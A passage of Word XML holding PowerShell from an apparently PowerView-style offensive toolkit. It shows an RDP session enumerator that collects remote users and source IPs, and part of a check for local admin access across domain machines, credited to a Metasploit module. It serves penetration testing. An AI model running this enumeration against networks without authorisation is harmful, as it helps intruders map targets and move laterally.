    <w:p w14:paraId="3CCEFADC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $pCount = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A90E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5814E21A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get information on all current sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3432DBAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E22930E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F7048B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Locate the offset of the initial intPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A18885" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Offset = $ppSessionInfo.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFEFE1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D671698" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if (($Result -ne 0) -and ($Offset -gt 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DAA0D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C58611F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Work out how much to increment the pointer by finding out the size of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3592AB05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Increment = $WTS_SESSION_INFO_1::GetSize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7A09A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D992037" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # parse all the result structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5675C9E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            for ($i = 0; ($i -lt $pCount); $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE85CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF9A68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # create a new int ptr at the given offset and cast the pointer as our result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730363B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64155ED0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Info = $NewIntPtr -as $WTS_SESSION_INFO_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E32ACE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7FEDE11F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $RDPSession = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E25C9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E080B10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($Info.pHostName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D53B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA11A00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F4445" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319AF5D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if no hostname returned, use the specified hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D60CCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5EA31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E62BD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="202CF9B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78742802" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B2FC8B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333F537" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if a domain isn't returned just use the username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B530590" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B094333" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D63C5DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AA4397" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EFDA50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2196FC77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38602D0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD6B65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $RDPSession | Add-Member Noteproperty 'State' $Info.State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FDDE75" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D4BDD09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $ppBuffer = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B7465" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $pBytesReturned = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5CFD2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D69101E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # query for the source client IP with WTSQuerySessionInformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C4343" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                #   https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCD3E9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE85F6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10A200F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Result -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BBCE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError2).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075AB41A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBBF62E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0070B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Offset2 = $ppBuffer.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237B2403" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46215A09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0887E809" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60DD4FCC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $SourceIP = $Info2.Address       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B3D99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($SourceIP[2] -ne 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286CD0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $SourceIP = [String]$SourceIP[2]+"."+[String]$SourceIP[3]+"."+[String]$SourceIP[4]+"."+[String]$SourceIP[5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18756DF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C07D146" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F46E02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $SourceIP = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762CF4B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B47D27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="683210F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C1BEBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $RDPSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABECE19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24F55778" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # free up the memory buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73296DE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    $Null = $Wtsapi32::WTSFreeMemory($ppBuffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17696865" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="41D6B6BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Offset += $Increment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D7EDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6927C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6627ACF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # free up the memory result buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B22ADD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73B021" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D389D1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEFFAB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471F327" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A139C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Close off the service handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F057C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Null = $Wtsapi32::WTSCloseServer($Handle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2260A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E1E0A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68730F52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FBBA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E7046" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD60445" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="396EB8E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67B8A792" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Invoke-CheckLocalAdminAccess {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32017F94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E882E0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B8808" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="577E768B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function will use the OpenSCManagerW Win32API call to establish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299691F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a handle to the remote host. If this succeeds, the current user context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A2738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        has local administrator acess to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F4032" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6DFEA87C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Idea stolen from the local_admin_search_enum post module in Metasploit written by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D929395" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Brandon McCann "zeknox" &lt;bmccann[at]accuvant.com&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34A2C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Thomas McCarthy "smilingraccoon" &lt;smilingraccoon[at]gmail.com&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D54A7F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Royce Davis "r3dy" &lt;rdavis[at]accuvant.com&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BCB77B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="79D789C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC810F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C801576" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query for active sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C410C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24C3A17E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .OUTPUTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00172F67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1482209E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $True if the current user has local admin access to the hostname, $False otherwise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A0897" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A988361" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F517E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10A2AF78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-CheckLocalAdminAccess -ComputerName sqlserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C324B0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40766EB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active sessions on the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8159E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F622E48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249671AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A93B484" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer | Invoke-CheckLocalAdminAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F810E69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25129F8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Sees what machines in the domain the current user has access to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F89B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="75D1F7E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131F75DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38F97454" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F09A93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66CDFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF98C3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F863A36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
